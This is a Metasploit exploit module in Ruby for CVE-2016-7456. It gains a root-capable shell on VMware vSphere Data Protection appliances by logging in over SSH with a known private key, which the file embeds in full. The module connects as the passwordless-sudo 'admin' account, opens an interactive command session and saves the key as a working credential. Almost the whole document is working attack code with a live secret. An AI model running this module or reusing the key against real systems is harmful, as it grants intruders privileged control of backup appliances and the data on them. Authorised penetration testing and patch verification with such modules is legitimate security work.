##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'net/ssh'
require 'net/ssh/command_stream'
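class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::SSH
  include Msf::Auxiliary::Report

  # Account the leaked key authenticates as. Shared by the SSH login and the
  # credential written back to the database so the two cannot drift apart.
  KEY_USERNAME = 'admin'.freeze

  def initialize(info = {})
    super(
      update_info(
        info,
        {
          'Name' => 'VMware VDP Known SSH Key',
          'Description' => %q{
            VMware vSphere Data Protection appliances 5.5.x through 6.1.x contain a known ssh private key for the local user admin who is a sudoer without password.
          },
          'Platform' => 'unix',
          'Arch' => ARCH_CMD,
          # The login account is described above as a passwordless sudoer.
          'Privileged' => true,
          'Targets' => [ [ 'Universal', {} ] ],
          'Payload' => {
            'Compat' => {
              'PayloadType' => 'cmd_interact',
              'ConnectionType' => 'find'
            }
          },
          'Author' => ['phroxvs'],
          'License' => MSF_LICENSE,
          'References' => [
            [ 'CVE', '2016-7456' ],
            [ 'URL', 'https://www.vmware.com/security/advisories/VMSA-2016-0024.html' ],
            [ 'ATT&CK', Mitre::Attack::Technique::T1021_004_SSH ],
          ],
          'DisclosureDate' => '2016-12-20',
          'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' },
          'DefaultTarget' => 0,
          'Notes' => {
            'Stability' => [CRASH_SAFE],
            'Reliability' => [REPEATABLE_SESSION],
            # A successful publickey login is an ordinary sshd authentication
            # event on the appliance and is expected to appear in its auth logs.
            'SideEffects' => [IOC_IN_LOGS]
          }
        }
      )
    )

    register_options(
      [
        # Since we don't include Tcp, we have to register this manually
        Opt::RHOST(),
        Opt::RPORT(22)
      ], self.class
    )

    register_advanced_options(
      [
        OptBool.new('SSH_DEBUG', [ false, 'Enable SSH debugging output (Extreme verbosity!)', false]),
        OptInt.new('SSH_TIMEOUT', [ false, 'Specify the maximum time to negotiate a SSH session', 30])
      ]
    )
  end

  # helper methods that normally come from Tcp
  def rhost
    datastore['RHOST']
  end

  def rport
    datastore['RPORT']
  end

  # Authenticates to RHOST:RPORT over SSH as KEY_USERNAME using only the
  # embedded private key; no password or other auth method is offered.
  #
  # @return [Net::SSH::CommandStream] a command stream wrapping the live
  #   session on success
  # @return [nil] on connection failure, disconnect, timeout, rejected key
  #   or any other Net::SSH error (every failure except a connection-level
  #   one prints a message first)
  def do_login
    ssh_opts = ssh_client_defaults.merge(
      auth_methods: ['publickey'],
      port: rport,
      key_data: [ key_data ]
    )
    ssh_opts[:verbose] = :debug if datastore['SSH_DEBUG']

    ssh = nil
    begin
      ::Timeout.timeout(datastore['SSH_TIMEOUT']) do
        ssh = Net::SSH.start(rhost, KEY_USERNAME, ssh_opts)
      end
    rescue Rex::ConnectionError
      # Connection-level failure: nothing further to report here.
      return
    rescue Net::SSH::Disconnect, ::EOFError
      print_error "#{rhost}:#{rport} SSH - Disconnected during negotiation"
      return
    rescue ::Timeout::Error
      print_error "#{rhost}:#{rport} SSH - Timed out during negotiation"
      return
    rescue Net::SSH::AuthenticationFailed
      # The key was rejected: the appliance no longer trusts it. Return
      # explicitly like every other failure branch instead of falling through.
      print_error "#{rhost}:#{rport} SSH - Failed authentication"
      return
    rescue Net::SSH::Exception => e
      print_error "#{rhost}:#{rport} SSH Error: #{e.class} : #{e.message}"
      return
    end

    return unless ssh

    # Wrap the session in a command stream and stop tracking its transport
    # socket ourselves, so the stream (not module cleanup) owns its lifetime.
    stream = Net::SSH::CommandStream.new(ssh, logger: self)
    sockets.delete(ssh.transport.socket)
    stream
  end

  # Logs in with the known key, records that key as a working credential for
  # the target, then hands the SSH command stream to the payload handler.
  def exploit
    conn = do_login
    return unless conn

    print_good 'Successful login'
    report_known_key_login
    handler(conn.lsock)
  end

  # Stores the embedded key as an :ssh_key credential for KEY_USERNAME and
  # records a successful login with it against RHOST:RPORT.
  def report_known_key_login
    service_data = {
      address: rhost,
      port: rport,
      protocol: 'tcp',
      service_name: 'ssh',
      workspace_id: myworkspace_id
    }
    credential_data = service_data.merge(
      username: KEY_USERNAME,
      private_type: :ssh_key,
      private_data: key_data,
      origin_type: :service,
      module_fullname: fullname
    )
    core = create_credential(credential_data)
    create_credential_login(service_data.merge(core: core, last_attempted: Time.now))
  end

  # The private key shipped on affected appliances (CVE-2016-7456). It is the
  # authentication secret itself, not a placeholder: any host that still
  # accepts it has not had the key removed.
  #
  # @return [String] PEM-encoded RSA private key
  def key_data
    <<~EOF
      -----BEGIN RSA PRIVATE KEY-----
      MIICWQIBAAKBgQCx/XgSpdlvoy1fABui75RYQFTRGPdkHBolTNIAeA91aPfnAr2X
      /PuZR/DiHMCYcn6/8A5Jn75YOD3OL0mumJJR1uQ4pyhY+MSptiMYxhvDLIiRRo16
      9jewWCSH/7jqWH8NhImpVxt5SjWtKhQInTdPkG1dCj8oSn87bt8fKvLcVQIBIwKB
      gFuJq3dN+suzAWQOryCYeC1i6cqfICTbQKV39vjtScdajh8IuUbZ4Hq3SK7M9VW3
      Od8NvjR+Ch691qSNWRf2saWS5MHiaYGF3xWwZokbJWJWmxlQ+Di9QAyRkjDIuMCR
      Sj/vvCa6kWzZlSZWOyNbs38XkWoKXqVYwtnyXrINpZJTAkEA2p0ZrCKQTWBKt7aT
      Rvx/8xnoYu9hSXIG1k11ql0HZdRpmveuZe64Gl6oJtgBZMXNdvAds+gvGTVCSfBO
      c2ne0wJBANBt3t84oicWJpkzXnUBPOZdheKfAK6QO7weXiRmbILTJ5drPdu8pmxR
      c1uQJgYitaSNKglJmz2WNOoaPZz/7zcCQBj8Au8Z5Jsg8pinJsZIvippXGMUCx5W
      LKrHBiIZQqyNTeXTKd/DgsEvY6yq+NhRHsvDq5+IP+Wfr83vk+/u16MCQE1qozz3
      xzMW2yL10qB8zXoivLNCX1bH26xFyzIXaiH2qE4vJZrCabM0MilSzEtr+lMP3GnZ
      gs27cr1aNCRfD7UCQHOXGagsD/ijMGNcWPBQOY3foHzxozoBLGmysAmVz3vX6uyr
      Y7oq9O5vDxwpMOAZ9JYTFuzEoWWg16L6SnNVYU4=
      -----END RSA PRIVATE KEY-----
    EOF
  end
end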